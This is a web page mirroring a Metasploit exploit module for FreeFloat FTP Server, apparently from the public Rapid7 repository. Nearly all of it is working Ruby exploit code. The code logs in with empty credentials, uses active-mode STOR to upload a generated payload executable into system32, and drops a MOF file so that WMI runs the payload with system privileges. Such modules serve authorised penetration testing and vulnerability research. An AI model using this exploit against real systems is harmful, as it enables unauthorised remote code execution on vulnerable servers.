Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/freefloatftp_wbem.rb
24830 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Ftp

10
  include Msf::Exploit::Remote::TcpServer

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::WbemExec

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => "FreeFloat FTP Server Arbitrary File Upload",

20
        'Description' => %q{

21
          This module abuses multiple issues in FreeFloat: 1. No credential is actually

22
          needed to login; 2. User's default path is in C:\, and this cannot be changed;

23
          3. User can write to anywhere on the server's file system.  As a result of these

24
          poor implementations, a malicious user can just log in and then upload files,

25
          and let WMI (Management Instrumentation service) to execute the payload uploaded.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'sinn3r', # Vulnerability discovery, Metasploit module

30
          'juan vazquez' # Metasploit module

31
        ],

32
        'References' => [

33
          ['CVE', '2012-10030'],

34
          ['OSVDB', '88302'],

35
          ['OSVDB', '88303']

36
        ],

37
        'Platform' => 'win',

38
        'Targets' => [

39
          ['FreeFloat', {}]

40
        ],

41
        'Privileged' => true,

42
        'DisclosureDate' => '2012-12-07',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        # Change the default description so this option makes sense

55
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])

56
      ]

57
    )

58


59
    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password

60
  end

61


62
  def check

63
    connect

64
    disconnect

65


66
    if banner =~ /FreeFloat/

67
      return Exploit::CheckCode::Detected

68
    else

69
      return Exploit::CheckCode::Safe

70
    end

71
  end

72


73
  def on_client_connect(cli)

74
    peer = "#{cli.peerhost}:#{cli.peerport}"

75


76
    case @stage

77
    when :exe

78
      print_status("Sending executable (#{@exe.length.to_s} bytes)")

79
      cli.put(@exe)

80
      @stage = :mof

81


82
    when :mof

83
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")

84
      cli.put(@mof)

85
    end

86


87
    cli.close

88
  end

89


90
  def upload(filename)

91
    select(nil, nil, nil, 1)

92


93
    peer = "#{rhost}:#{rport}"

94
    print_status("Trying to upload #{::File.basename(filename)}")

95


96
    conn = connect(false, datastore['VERBOSE'])

97


98
    print_status("Sending empty login...")

99


100
    res = send_user("", conn)

101
    if not res or res !~ /331/

102
      print_error("Error sending username")

103
      return false

104
    end

105


106
    res = send_pass("", conn)

107
    if not res or res !~ /230/

108
      print_error("Error sending password")

109
      return false

110
    end

111


112
    print_good("Empty authentication was successful")

113


114
    # Switch to binary mode

115
    print_status("Set binary mode")

116
    send_cmd(['TYPE', 'I'], true, conn)

117


118
    # Prepare active mode: Get attacker's IP and source port

119
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']

120
    src_port = datastore['SRVPORT'].to_i

121


122
    # Prepare active mode: Convert the IP and port for active mode

123
    src_ip = src_ip.gsub(/\./, ',')

124
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

125


126
    # Set to active mode

127
    print_status("Set active mode \"#{src_ip},#{src_port}\"")

128
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

129


130
    # Tell the FTP server to download our file

131
    send_cmd(['STOR', filename], false, conn)

132


133
    disconnect(conn)

134
  end

135


136
  def exploit

137
    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10) + 5)}.exe"

138
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"

139
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))

140
    @exe = generate_payload_exe

141
    @stage = :exe

142


143
    begin

144
      t = framework.threads.spawn("reqs", false) {

145
        begin

146
          # Upload our malicious executable

147
          u = upload(exe_name)

148
          # Upload the mof file

149
          upload(mof_name) if u

150
          register_file_for_cleanup("#{::File.basename(exe_name)}")

151
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")

152
        rescue ::Exception => e

153
          print_error "Upload Failed: #{e.message}"

154
          cleanup

155
        end

156
      }

157
      super

158
    ensure

159
      t.kill

160
    end

161
  end

162
end

163


164